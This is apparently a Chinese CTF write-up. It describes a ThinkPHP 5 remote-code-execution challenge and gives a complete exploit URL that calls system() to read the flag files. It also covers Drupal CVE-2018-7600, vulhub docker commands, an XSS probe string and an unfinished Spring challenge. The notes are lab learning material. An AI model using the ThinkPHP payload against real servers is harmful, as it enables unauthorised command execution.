御林10
只做了第一个其他的不会(挨打
best language (Think PHP V5)
攻防世界这道题,考察的是thinkphp V5的漏洞,接下来我详细介绍一下thinkphp V5这个漏洞。
ThinkPHP 5漏洞简介
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本
漏洞分析
程序未对控制器进行过滤,导致攻击者可以用 \(斜杠)调用任意类方法。
构造链接,
http://121.5.35.176:30002/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
*是通配符号
其中:s[1][]=(Linux指令)
还存在一些问题为什么参数是s,以及Think php V5的漏洞学习
drupal
漏洞简介:
Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。
漏洞原理:
drupal的注册页面,当我们提交的数据有问题时,它会把我们传入的参数构造成表单数组,然后经过渲染成html页面返回。当我们传入的参数是精心构造时,就会导致意外的发生。
key是传递的搜索表单提交数据
并且确实构造成为表单数组并渲染HRML返回在搜索两个字后面
补充:docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down
构造
" onfocus="javascript:alert(1)
貌似不是XSS
搜索id=1也没有任何返回值看起来不像SQL注入
spring
GET传入name和age参数回显正常
Spring框架漏洞总结
好像不是这个题(
过滤了单引号
好像又好了(雾)